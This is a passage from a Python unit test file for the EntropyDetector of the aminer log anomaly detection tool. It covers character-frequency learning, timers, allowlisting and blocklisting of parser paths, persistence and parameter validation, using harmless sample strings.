124], ["B", 48], ["E", 247], ["D", 328], ["G", 216], ["F", 2], ["I", 92], ["H", 2], ["K", 22], ["J", 2], ["L", 4], ["O", 186], ["N", 40], ["S", 124], ["R", 13], ["U", 20], ["T", 298], ["V", 13], ["Y", 14], ["a", 3392], ["e", 2202], ["i", 1384], ["o", 4850], ["u", 72]]], ["R", [["!", 2], [" ", 2352], ["\"", 4], ["'", 20], ["*", 6], ["-", 4], [",", 78], [".", 718], [":", 2], ["?", 2], ["A", 178], ["C", 20], ["B", 12], ["E", 320], ["D", 100], ["G", 68], ["F", 4], ["I", 219], ["K", 70], ["M", 30], ["L", 42], ["O", 189], ["N", 84], ["Q", 2], ["P", 18], ["S", 90], ["R", 70], ["U", 34], ["T", 272], ["W", 16], ["V", 14], ["Y", 93], ["a", 374], ["e", 1237], ["i", 323], ["h", 52], ["o", 2304], ["u", 2014], ["t", 2], ["y", 20]]], ["V", [["A", 47], ["a", 1798], ["B", 2], ["E", 276], ["'", 2], [" ", 18], ["I", 587], ["-", 2], [",", 12], ["O", 26], ["l", 30], ["i", 510], ["r", 4], ["U", 2], ["o", 228], ["y", 26], ["e", 465], ["R", 22], [".", 162], ["u", 4], ["Y", 6]]], ["Z", [["a", 32], ["\"", 2], ["E", 16], ["d", 4], ["I", 2], ["h", 68], [",", 4], ["o", 22], ["n", 30], ["i", 26], ["u", 10], ["O", 4], ["e", 124]]], ["b", [["!", 40], [" ", 1058], ["'", 68], [")", 4], ["*", 4], ["-", 98], [",", 414], [".", 244], [";", 24], [":", 6], ["?", 36], [">", 4], ["a", 13924], ["c", 22], ["b", 1618], ["e", 60104], ["d", 78], ["g", 4], ["f", 16], ["i", 6998], ["h", 46], ["j", 990], ["m", 324], ["l", 22082], ["o", 19980], ["n", 44], ["s", 2992], ["r", 13256], ["u", 20366], ["t", 1570], ["w", 30], ["v", 88], ["y", 13906]]], ["f", [["!", 178], [" ", 90391], ["\"", 8], ["'", 72], [")", 16], ["*", 2], ["-", 876], [",", 2770], [".", 1846], [";", 240], [":", 102], ["?", 144], ["G", 2], ["I", 2], ["a", 20108], ["c", 14], ["b", 38], ["e", 23990], ["d", 2], ["g", 10], ["f", 10886], ["i", 22788], ["h", 6], ["k", 12], ["j", 16], ["m", 12], ["l", 7808], ["o", 46468], ["n", 16], ["p", 2], ["s", 464], ["r", 21052], ["u", 10540], ["t", 10202], ["w", 62], ["v", 2], ["y", 396], ["x", 2]]], ["j", [["a", 724], ["!", 2], ["e", 4002], ["'", 2], ["i", 118], ["o", 3558], [".", 4], ["u", 4654]]], ["n", [["!", 1140], [" ", 164227], ["\"", 84], ["'", 9982], [")", 108], ["*", 6], ["-", 2184], [",", 19804], [".", 11592], [";", 1670], [":", 478], ["?", 1178], [">", 50], ["J", 4], ["]", 18], ["_", 4], ["a", 17316], ["c", 30762], ["b", 372], ["e", 74881], ["d", 155134], ["g", 116276], ["f", 3720], ["i", 23814], ["h", 996], ["k", 7828], ["j", 896], ["m", 518], ["l", 7014], ["o", 57750], ["n", 7832], ["q", 950], ["p", 298], ["s", 29725], ["r", 506], ["u", 4864], ["t", 72732], ["w", 558], ["v", 3580], ["y", 9090], ["x", 498], ["z", 154], ["}", 4]]], ["r", [["!", 1102], [" ", 128583], ["\"", 78], ["'", 2438], [")", 108], ["*", 14], ["-", 2050], [",", 18518], [".", 12898], [";", 1346], [":", 332], ["?", 1112], [">", 28], ["A", 2], ["@", 14], ["_", 6], ["a", 45838], ["c", 7992], ["b", 2520], ["e", 175663], ["d", 22490], ["g", 6450], ["f", 3064], ["i", 57977], ["h", 1474], ["k", 6764], ["j", 14], ["m", 12284], ["l", 8396], ["o", 61720], ["n", 15999], ["q", 220], ["p", 3358], ["s", 36440], ["r", 17042], ["u", 12282], ["t", 29678], ["w", 1522], ["v", 4906], ["y", 24200], ["x", 6], ["z", 128]]], ["v", [["!", 34], [" ", 1478], ["'", 360], [")", 2], ["-", 58], [",", 566], [".", 316], [";", 12], [":", 4], ["?", 30], ["_", 2], ["a", 8210], ["e", 85189], ["g", 2], ["i", 17242], ["k", 2], ["m", 16], ["l", 218], ["o", 6350], ["n", 508], ["s", 216], ["r", 658], ["u", 248], ["t", 4], ["v", 22], ["y", 640]]], ["z", [["!", 8], [" ", 344], ["\"", 2], ["'", 14], [")", 4], ["-", 40], [",", 172], [".", 178], [";", 8], [":", 2], ["?", 22], ["a", 592], ["b", 6], ["e", 3788], ["d", 18], ["g", 8], ["i", 920], ["h", 122], ["k", 6], ["m", 104], ["l", 356], ["o", 1122], ["n", 2], ["s", 6], ["r", 2], ["u", 156], ["v", 14], ["y", 202], ["z", 622]]], ["~", [[")", 6]]], ["\t", [["\t", 174], [" ", 136], ["D", 2]]], ["!", [["!", 12], [" ", 7580], ["\"", 6860], ["'", 556], [")", 42], ["*", 12], ["-", 108], [",", 4], [".", 170], ["I", 2], ["v", 6], ["[", 2], ["_", 6]]], ["%", [[" ", 8]]], [")", [[" ", 830], ["-", 56], [",", 506], [".", 102], ["5", 2], ["[", 2], [":", 16], [";", 58], ["?", 2]]], ["-", [["!", 8], [" ", 5090], ["\"", 550], ["'", 68], ["(", 2], ["+", 4], ["-", 6008], [",", 22], [".", 2], ["1", 12], ["2", 16], ["5", 24], ["4", 2], ["7", 4], ["6", 6], ["8", 4], ["?", 22], ["A", 170], ["C", 118], ["B", 200], ["E", 88], ["D", 116], ["G", 118], ["F", 62], ["I", 194], ["H", 172], ["K", 16], ["J", 90], ["M", 196], ["L", 74], ["O", 38], ["N", 44], ["Q", 6], ["P", 134], ["S", 172], ["R", 44], ["T", 160], ["W", 74], ["V", 28], ["Y", 22], ["Z", 4], ["a", 1098], ["`", 16], ["c", 1092], ["b", 1366], ["e", 476], ["d", 942], ["g", 452], ["f", 1014], ["i", 408], ["h", 966], ["k", 224], ["j", 64], ["m", 808], ["l", 922], ["o", 468], ["n", 446], ["q", 40], ["p", 884], ["s", 1836], ["r", 562], ["u", 122], ["t", 1410], ["w", 812], ["v", 66], ["y", 140], ["z", 12]]], ["1", [[" ", 112], ["'", 4], [")", 16], ["*", 10], ["-", 14], [",", 112], ["/", 2], [".", 68], ["1", 246], ["0", 318], ["3", 164], ["2", 280], ["5", 224], ["4", 214], ["7", 188], ["6", 204], ["9", 126], ["8", 572], [";", 4], [":", 40], ["@", 4], ["O", 2], ["]", 48], ["s", 52], ["t", 22], ["}", 18], ["|", 88]]], ["5", [[" ", 98], ["\"", 2], ["'", 2], ["-", 4], [",", 88], [".", 46], ["1", 22], ["0", 140], ["3", 28], ["2", 32], ["5", 32], ["4", 22], ["7", 32], ["6", 16], ["9", 14], ["8", 18], [";", 10], [":", 48], ["?", 2], ["@", 14], ["]", 64], ["t", 82], ["}", 18], ["|", 44]]], ["9", [[" ", 74], ["'", 2], [")", 4], ["-", 6], [",", 40], [".", 22], ["1", 26], ["0", 43], ["3", 48], ["2", 14], ["5", 18], ["4", 15], ["7", 34], ["6", 20], ["9", 18], ["8", 10], [";", 12], [":", 38], ["@", 6], ["]", 44], ["t", 32], ["}", 18], ["|", 46]]], ["=", [["E", 2], ["=", 8], ["T", 14], [" ", 12]]], ["A", [[" ", 4464], ["\"", 2], ["'", 12], ["-", 18], [",", 4], [".", 24], ["A", 6], ["C", 108], ["B", 58], ["E", 22], ["D", 77], ["G", 50], ["F", 18], ["I", 98], ["H", 10], ["K", 18], ["M", 89], ["L", 220], ["N", 497], ["Q", 2], ["P", 2116], ["S", 220], ["R", 481], ["U", 44], ["T", 292], ["W", 18], ["V", 78], ["Y", 66], ["X", 6], ["Z", 2], ["a", 2], ["c", 208], ["b", 496], ["e", 2], ["d", 372], ["g", 352], ["f", 1144], ["i", 66], ["h", 554], ["k", 64], ["j", 4], ["m", 1358], ["l", 3042], ["o", 140], ["n", 12454], ["q", 4], ["p", 230], ["s", 2898], ["r", 1643], ["u", 754], ["t", 3060], ["w", 48], ["v", 60], ["y", 30], ["x", 2], ["z", 30]]], ["E", [["!", 20], [" ", 1253], ["\"", 2], ["'", 18], ["*", 2], ["-", 14], [",", 30], [".", 100], [":", 8], ["?", 4], ["A", 176], ["C", 152], ["B", 30], ["E", 92], ["D", 166], ["G", 32], ["F", 34], ["I", 60], ["H", 6], ["K", 8], ["M", 80], ["L", 142], ["O", 14], ["N", 490], ["Q", 6], ["P", 124], ["S", 360], ["R", 730], ["U", 18], ["T", 184], ["W", 90], ["V", 102], ["Y", 34], ["X", 64], ["a", 450], ["c", 46], ["b", 14], ["d", 90], ["g", 62], ["f", 20], ["i", 64], ["h", 58], ["k", 6], ["m", 1500], ["l", 226], ["o", 4], ["n", 1398], ["q", 20], ["p", 138], ["s", 148], ["r", 118], ["u", 358], ["t", 98], ["v", 1326], ["y", 70], ["x", 298], ["z", 2], ["}", 2]]], ["I", [["!", 34], [" ", 40514], ["\"", 4], ["'", 2748], ["-", 52], [",", 526], [".", 576], [";", 42], [":", 6], ["?", 88], ["A", 76], ["C", 182], ["B", 47], ["E", 82], ["D", 78], ["G", 140], ["F", 78], ["I", 1054], ["K", 12], ["M", 76], ["L", 150], ["O", 134], ["N", 704], ["Q", 4], ["P", 18], ["S", 277], ["R", 122], ["U", 2], ["T", 378], ["V", 298], ["X", 156], ["Z", 8], ["_", 46], ["a", 2], ["c", 146], ["b", 10], ["d", 16], ["g", 48], ["f", 1944], ["m", 196], ["l", 216], ["o", 30], ["n", 5298], ["p", 28], ["s", 930], ["r", 122], ["t", 8656], ["v", 100], ["x", 2], ["z", 2]]], ["M", [["!", 4], [" ", 68], ["\"", 2], ["'", 12], ["-", 4], [",", 12], ["/", 8], [".", 1208], [":", 2], ["A", 346], ["C", 28], ["B", 34], ["E", 243], ["D", 6], ["G", 12], ["I", 130], ["M", 24], ["L", 2], ["O", 117], ["N", 16], ["P", 50], ["S", 26], ["R", 8], ["U", 28], ["W", 6], ["Y", 24], ["a", 8688], ["c", 378], ["e", 1576], ["f", 2], ["i", 2158], ["o", 4266], ["s", 2], ["r", 2578], ["u", 518], ["y", 1492]]], ["Q", [["U", 48], ["C", 2], ["u", 494], [".", 4]]], ["U", [["!", 2], [" ", 106], ["'", 6], [",", 2], [".", 10], ["A", 16], ["C", 48], ["B", 24], ["E", 54], ["D", 44], ["G", 12], ["F", 6], ["I", 12], ["K", 2], ["M", 60], ["L", 68], ["N", 116], ["P", 26], ["S", 130], ["R", 182], ["U", 2], ["T", 156], ["V", 2], ["Z", 6], ["c", 2], ["g", 12], ["h", 34], ["k", 4], ["m", 16], ["l", 30], ["n", 859], ["p", 360], ["s", 32], ["r", 68], ["t", 50], ["v", 16]]], ["Y", [["!", 4], [" ", 260], ["\"", 2], ["'", 4], ["-", 68], [",", 10], [".", 22], [";", 2], ["A", 2], ["B", 2], ["E", 26], ["L", 4], ["O", 112], ["S", 26], ["R", 4], ["T", 2], ["a", 122], ["c", 2], ["e", 1328], ["i", 10], ["o", 3878], ["s", 10], ["u", 26], ["v", 8]]], ["]", [["!", 2], [" ", 322], ["J", 2], ["-", 2], [",", 44], [".", 14], [";", 24], [">", 2]]], ["a", [["!", 310], [" ", 65518], ["\"", 24], ["'", 716], [")", 20], ["*", 1], ["-", 724], [",", 2766], [".", 1558], ["1", 2], [";", 152], [":", 30], ["?", 144], [">", 2], ["S", 2], ["_", 6], ["a", 122], ["`", 6], ["c", 35608], ["b", 19042], ["e", 752], ["d", 56288], ["g", 18377], ["f", 7666], ["i", 47228], ["h", 1140], ["k", 13604], ["j", 480], ["m", 24754], ["l", 68865], ["o", 314], ["n", 216874], ["q", 102], ["p", 18548], ["s", 105951], ["r", 97182], ["u", 12725], ["t", 135418], ["w", 10880], ["v", 25744], ["y", 29029], ["x", 666], ["z", 1906], ["}", 2]]], ["e", [["!", 3010], [" ", 487805], ["\"", 166], ["'", 4249], [")", 336], ["*", 10], ["-", 4298], [",", 40540], [".", 24278], [";", 3704], [":", 890], ["?", 2866], [">", 78], ["B", 2], ["I", 2], ["S", 2], ["[", 6], ["]", 18], ["_", 42], ["a", 79086], ["`", 2], ["c", 27918], ["b", 1598], ["e", 45884], ["d", 142368], ["g", 8394], ["f", 13916], ["i", 18692], ["h", 2842], ["k", 1590], ["j", 380], ["m", 31126], ["l", 54118], ["o", 4898], ["n", 129345], ["q", 1706], ["p", 17078], ["s", 100714], ["r", 205409], ["u", 2658], ["t", 41944], ["w", 11422], ["v", 24561], ["y", 23800], ["x", 14052], ["z", 560], ["}", 4]]], ["i", [["!", 50], [" ", 1222], ["\"", 2], ["'", 184], [")", 4], ["*", 2], ["-", 384], [",", 450], [".", 254], [";", 14], [":", 6], ["?", 14], ["@", 2], ["G", 2], ["Y", 2], ["]", 2], ["_", 8], ["a", 10716], ["c", 45183], ["b", 6986], ["e", 33445], ["d", 40015], ["g", 26388], ["f", 17002], ["i", 24], ["h", 72], ["k", 7006], ["j", 18], ["m", 40198], ["l", 43870], ["o", 33038], ["n", 232657], ["q", 394], ["p", 5884], ["s", 107323], ["r", 32008], ["u", 1844], ["t", 102683], ["w", 38], ["v", 16166], ["y", 2], ["x", 2074], ["z", 2892]]], ["m", [["!", 462], [" ", 35852], ["\"", 24], ["'", 294], [")", 58], ["-", 610], [",", 7564], [".", 6290], ["1", 2], [";", 758], [":", 298], ["?", 470], [">", 22], ["]", 2], ["a", 45673], ["c", 96], ["b", 7420], ["e", 83120], ["d", 36], ["g", 4], ["f", 768], ["i", 24836], ["h", 10], ["k", 22], ["m", 5770], ["l", 522], ["o", 32940], ["n", 1218], ["p", 15046], ["s", 8640], ["r", 202], ["u", 10278], ["t", 200], ["w", 24], ["y", 17480]]], ["q", [["a", 2], [" ", 2], ["u", 12073], [",", 2], ["'", 2]]], ["u", [["!", 428], [" ", 17752], ["\"", 16], ["'", 1182], [")", 6], ["-", 186], [",", 1924], [".", 1140], [";", 124], [":", 18], ["?", 428], ["S", 12], ["T", 2], ["_", 2], ["a", 6632], ["c", 12934], ["b", 5730], ["e", 10797], ["d", 6988], ["g", 18286], ["f", 2056], ["i", 9148], ["h", 30], ["k", 496], ["j", 84], ["m", 8440], ["l", 37068], ["o", 708], ["n", 43221], ["q", 64], ["p", 17232], ["s", 44836], ["r", 48568], ["u", 18], ["t", 49162], ["w", 10], ["v", 428], ["y", 210], ["x", 498], ["z", 722]]], ["y", [["!", 1032], [" ", 118640], ["\"", 62], ["'", 1440], [")", 154], ["-", 2010], [",", 18388], [".", 10860], [";", 1366], [":", 466], ["?", 946], [">", 26], ["]", 2], ["_", 4], ["a", 2624], ["`", 2], ["c", 242], ["b", 640], ["e", 11272], ["d", 206], ["g", 138], ["f", 198], ["i", 4422], ["h", 84], ["k", 76], ["m", 714], ["l", 818], ["o", 28106], ["n", 212], ["p", 410], ["s", 8723], ["r", 738], ["u", 58], ["t", 3028], ["w", 464], ["v", 110], ["x", 14], ["z", 40]]], ["}", [[" ", 6], [",", 2]]]]] freq = {} total_freq = {} for elem in default_f[2]: first_char = int.from_bytes(bytes(elem[0], "utf-8"), "big") second_char_list = elem[1] freq[first_char] = {} total_freq[first_char] = 0 for second_char_elem in second_char_list: second_char = int.from_bytes(bytes(second_char_elem[0], "utf-8"), "big") frequency = second_char_elem[1] freq[first_char][second_char] = frequency total_freq[first_char] += frequency ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # skip_repetitions = True ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], skip_repetitions=True, learn_mode=True, output_logline=False) total_freq = {} freq = {} ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # frequencies should not change if skip_repetitions = True ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # stop_learning_time ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(ed.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(ed.receive_atom(log_atom1)) self.assertTrue(ed.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(ed.receive_atom(log_atom1)) self.assertFalse(ed.learn_mode) # stop_learning_no_anomaly_time ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(ed.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(ed.receive_atom(log_atom1)) self.assertTrue(ed.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(ed.receive_atom(log_atom2)) self.assertTrue(ed.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(ed.receive_atom(log_atom3)) self.assertTrue(ed.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(ed.receive_atom(log_atom1)) self.assertFalse(ed.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"]) t = time.time() ed.next_persist_time = t + 400 self.assertEqual(ed.do_timer(t + 200), 200) self.assertEqual(ed.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(ed.do_timer(t + 999), 1) self.assertEqual(ed.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"]) analysis = "Analysis.%s" self.assertRaises(Exception, ed.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EntropyDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, ed.allowlist_event, analysis % ed.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(ed.allowlist_event(analysis % ed.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % ed.__class__.__name__)) self.assertEqual(ed.constraint_list, ["/s1"]) ed.learn_mode = False self.assertEqual(ed.allowlist_event(analysis % ed.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % ed.__class__.__name__)) self.assertEqual(ed.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"]) analysis = "Analysis.%s" self.assertRaises(Exception, ed.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EntropyDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, ed.blocklist_event, analysis % ed.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(ed.blocklist_event(analysis % ed.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % ed.__class__.__name__)) self.assertEqual(ed.ignore_list, ["/s1"]) ed.learn_mode = False self.assertEqual(ed.blocklist_event(analysis % ed.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % ed.__class__.__name__)) self.assertEqual(ed.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.05, learn_mode=True, output_logline=False) log_atom1 = LogAtom(b"aminer", ParserMatch(MatchElement("/value", b"aminer", b"aminer", None)), t + 1, None) log_atom2 = LogAtom(b"logdata-anomaly-miner", ParserMatch(MatchElement("/value", b"logdata-anomaly-miner", b"logdata-anomaly-miner", None)), t + 2, None) log_atom3 = LogAtom(b"ait-aecid", ParserMatch(MatchElement("/value", b"ait-aecid", b"ait-aecid", None)), t + 3, None) log_atom4 = LogAtom(b"austrian", ParserMatch(MatchElement("/value", b"austrian", b"austrian", None)), t + 4, None) log_atom5 = LogAtom(b"institute", ParserMatch(MatchElement("/value", b"institute", b"institute", None)), t + 5, None) log_atom6 = LogAtom(b"lfmvasacz", ParserMatch(MatchElement("/value", b"lfmvasacz", b"lfmvasacz", None)), t + 6, None) total_freq = {} freq = {} ed.receive_atom(log_atom1) self.add_data(log_atom1.raw_data.decode(), freq, total_freq) ed.receive_atom(log_atom2) self.add_data(log_atom2.raw_data.decode(), freq, total_freq) ed.receive_atom(log_atom3) self.add_data(log_atom3.raw_data.decode(), freq, total_freq) ed.receive_atom(log_atom4) self.add_data(log_atom4.raw_data.decode(), freq, total_freq) ed.receive_atom(log_atom5) self.add_data(log_atom5.raw_data.decode(), freq, total_freq) ed.receive_atom(log_atom6) self.add_data(log_atom6.raw_data.decode(), freq, total_freq) ed.do_persist() with open(ed.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[-1, [[97, 3], [108, 2], [105, 1]]], [97, [[109, 1], [116, 1], [45, 1], [110, 2], [108, 1], [105, 1], [101, 1], [117, 1], [115, 1], [99, 1]]], [109, [[105, 2], [97, 1], [118, 1]]], [105, [[110, 3], [116, 2], [100, 1], [97, 1]]], [110, [[101, 2], [111, 1], [-1, 1], [115, 1]]], [101, [[114, 2], [99, 1], [-1, 1]]], [114, [[-1, 2], [105, 1]]], [108, [[111, 1], [121, 1], [102, 1]]], [111, [[103, 1], [109, 1]]], [103, [[100, 1]]], [100, [[97, 1], [-1, 1]]], [116, [[97, 1], [45, 1], [114, 1], [105, 1], [117, 1], [101, 1]]], [45, [[97, 2], [109, 1]]], [121, [[45, 1]]], [99, [[105, 1], [122, 1]]], [117, [[115, 1], [116, 1]]], [115, [[116, 2], [97, 1]]], [102, [[109, 1]]], [118, [[97, 1]]], [122, [[-1, 1]]]]') self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.total_freq = {} ed.freq = {} ed.load_persistence_data() self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) other = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.05, learn_mode=True, output_logline=False) self.assertEqual(other.total_freq, ed.total_freq) self.assertEqual(other.freq, ed.freq) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EntropyDetector, self.aminer_config, ["default"], ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, None, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, "", ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, b"Default", ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, True, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, 123, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, 123.3, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, {"id": "Default"}, ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, (), ["/model/value"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, set(), ["/model/value"]) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], [""]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], set()) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=-1) self.assertRaises(ValueError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=1.1) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=b"Default") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh="123") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=0) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=0.5) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], prob_thresh=1) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs="True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=123.22) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs={"id": "Default"}) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=["Default"]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=[]) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=()) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=set()) EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], default_freqs=True) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=b"True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions="True") self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=123) self.assertRaises(TypeError, EntropyDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], skip_repetitions=123.22) 